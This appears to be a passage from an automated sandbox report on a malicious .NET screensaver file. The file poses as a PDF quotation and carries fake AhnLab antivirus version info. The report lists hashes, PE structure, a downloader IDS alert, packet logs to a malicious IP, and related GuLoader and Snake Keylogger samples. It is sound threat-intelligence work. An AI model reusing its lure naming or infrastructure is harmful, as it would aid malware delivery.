	ram.ps1	Get hash	malicious	Unknown	Browse	193.30.119.107
	payload.ps1	Get hash	malicious	Kdot Stealer	Browse	193.30.119.107
	Poundbreach178.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.30.119.107
	Opsprtning.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.30.119.107
	runner.ps1	Get hash	malicious	Unknown	Browse	193.30.119.107
	DHL AWB Document_pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.30.119.107

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	2.4218115657128667
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	QUOTATION_JANQUOTE312025#U00faPDF.scr
File size:	340'480 bytes
MD5:	e63401dadbae9a4ebd6ce665946ea633
SHA1:	9ac1d2865acfd258a07cb867a0b312b0928045dd
SHA256:	95ae323853bc8dd988d2ff7c9385d63e6fb5147e409a91cddf60a121f17928a5
SHA512:	2ebaa1787e81a313a7c7339f1b1241b0ae46de63f8ea8f7e37c5ec00f3cec91e7c1cd67063acefdb953abe1b55f4f2e8593fdecf313ab16ccbcf122607172981
SSDEEP:	768:qhgYedQg2ZzEjss2VSg1I1cn0sspAgpq8hLyg1uMN0+dzsRs+eEG:KedQ7qPpqOLy0uyL+fG
TLSH:	6974DA5A7A74A132ED00CA3419F69E11D2DBEE6C2BE0551D24D8F66D1B326FE8F039C1
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...F..g............................^0... ...@....@.. ....................................`................................

File Icon


Icon Hash:	0e3333b0bbb3b035

Static PE Info

General

Entrypoint:	0x40305e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67AE0F46 [Thu Feb 13 15:27:02 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3010	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4000	0x51ada	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x56000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x1064	0x1200	63983ce5018ee1be61de274997389292	False	0.5492621527777778	data	5.170205298427823	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x4000	0x51ada	0x51c00	4289df6fc7f5543838cf1e63f5c72374	False	0.07139956039755352	data	2.351917781078981	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x56000	0xc	0x200	ef80c4145185676d9023d2c1c871b31f	False	0.04296875	data	0.07763316234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x4370	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	0.7601351351351351
RT_ICON	0x4498	0x368	Device independent bitmap graphic, 16 x 32 x 24, image size 832	0.7155963302752294
RT_ICON	0x4800	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.6826241134751773
RT_ICON	0x4c68	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	0.5389784946236559
RT_ICON	0x4f50	0xca8	Device independent bitmap graphic, 32 x 64 x 24, image size 3200	0.470679012345679
RT_ICON	0x5bf8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.4378517823639775
RT_ICON	0x6ca0	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1536	0.36402439024390243
RT_ICON	0x7308	0x1ca8	Device independent bitmap graphic, 48 x 96 x 24, image size 7296	0.33110687022900764
RT_ICON	0x8fb0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.30881742738589213
RT_ICON	0xb558	0xa68	Device independent bitmap graphic, 64 x 128 x 4, image size 2560	0.2924174174174174
RT_ICON	0xbfc0	0x3228	Device independent bitmap graphic, 64 x 128 x 24, image size 12800	0.26580996884735203
RT_ICON	0xf1e8	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 0	0.24244213509683515
RT_ICON	0x13410	0x42028	Device independent bitmap graphic, 256 x 512 x 32, image size 0	0.014139568600763382
RT_GROUP_ICON	0x55438	0xbc	data	0.5797872340425532
RT_VERSION	0x554f4	0x3fc	data	0.40294117647058825
RT_MANIFEST	0x558f0	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
Comments	AhnLab V3 Lite Main UI Application
CompanyName	AhnLab, Inc.
FileDescription	AhnLab V3 Lite Main UI Application
FileVersion	4.0.0.117
InternalName	Nlslnred.exe
LegalCopyright	2018-2019 AhnLab, Inc. All rights reserved.
LegalTrademarks
OriginalFilename	Nlslnred.exe
ProductName	AhnLab V3 Lite
ProductVersion	4.0.0.117
Assembly Version	4.0.0.117

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-02-14T09:21:32.648229+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49942	193.122.6.168	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 14, 2025 09:20:39.144536972 CET	49704	80	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:39.149512053 CET	80	49704	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:39.149796963 CET	49704	80	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:39.197093964 CET	49704	80	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:39.202053070 CET	80	49704	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:39.758234024 CET	80	49704	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:39.761178970 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:39.761228085 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:39.761306047 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:39.773077965 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:39.773113012 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:39.804558039 CET	49704	80	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:40.588079929 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:40.588258982 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:40.596756935 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:40.596796989 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:40.597003937 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:40.648322105 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:40.678359032 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:40.719332933 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:40.860847950 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:40.860869884 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:40.861020088 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:40.861083031 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:40.861146927 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:40.861710072 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:40.861718893 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:40.861793041 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:40.861807108 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:40.913988113 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:40.952501059 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:40.952512026 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:40.952570915 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:40.952577114 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:40.952601910 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:40.952626944 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:40.952652931 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:40.952668905 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:40.952778101 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:40.952837944 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:40.952843904 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:40.955935001 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:40.956017017 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:40.956033945 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:40.956191063 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:40.956268072 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:40.956274033 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.008116961 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.038388014 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.038399935 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.038662910 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.038724899 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.041106939 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.041146040 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.041212082 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.041229963 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.041265011 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.041927099 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.041992903 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.042005062 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.042092085 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.042151928 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.042162895 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.042834044 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.042898893 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.042912960 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.043704987 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.043797970 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.043808937 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.085958958 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.127079964 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.127090931 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.127134085 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.127159119 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.127311945 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.127311945 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.127376080 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.127432108 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.129792929 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.129870892 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.129884005 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.130162001 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.130219936 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.130230904 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.130461931 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.130517006 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.130527973 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.130772114 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.130825996 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.130836964 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.131216049 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.131278992 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.131299019 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.131633997 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.131692886 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.131704092 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.132141113 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.132205009 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.132215977 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.132289886 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.132342100 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.132353067 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.132436991 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.132488012 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.132499933 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.133040905 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.133120060 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.133131027 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.133260965 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.133315086 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.133325100 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.133356094 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.179718018 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.216012001 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.216022015 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.216195107 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.216411114 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.216418982 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.216439962 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.216439962 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.216516018 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.216559887 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.216583014 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.219160080 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.219250917 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.219264984 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.219394922 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.219461918 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.219474077 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.219805002 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.219880104 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.219891071 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.219949961 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.220010996 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.220021963 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.220120907 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.220180988 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.220194101 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.220325947 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.220381975 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.220391989 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.220603943 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.220669985 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.220679998 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.220783949 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.220844030 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.220854044 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.221271992 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.221339941 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.221350908 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.221441031 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.221499920 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.221509933 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.221590996 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.221652031 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.221662045 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.221764088 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.221827984 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.221837997 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.222203016 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.222269058 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.222280025 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.270863056 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.304507017 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.304586887 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.304727077 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.304727077 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.304790974 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.304846048 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.307185888 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.307279110 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.307292938 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.307440042 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.307502985 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.307514906 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.307604074 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.307670116 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.307682037 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.307912111 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.307977915 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.307988882 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.308202028 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.308269024 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.308280945 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.308384895 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.308449984 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.308460951 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.308768034 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.308834076 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.308844090 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.308955908 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.309026957 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.309036970 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.309277058 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.309344053 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.309355021 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.309433937 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.309494972 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.309504986 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.309758902 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.309834003 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.309844017 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.309909105 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.309968948 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.309978962 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.310050964 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.310116053 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.310127974 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.310400009 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.310456038 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.310467005 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.351576090 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.393502951 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.393600941 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.393738031 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.393738985 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.393802881 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.393860102 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.395935059 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.396013021 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.396025896 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.396275043 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.396338940 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.396368027 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.396640062 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.396703959 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.396725893 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.396960020 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.397021055 CET	49705	443	192.168.2.5	193.30.119.107
Feb 14, 2025 09:20:41.397031069 CET	443	49705	193.30.119.107	192.168.2.5
Feb 14, 2025 09:20:41.397191048 CET	443	49705	193.30.119.107	192.168.2.5
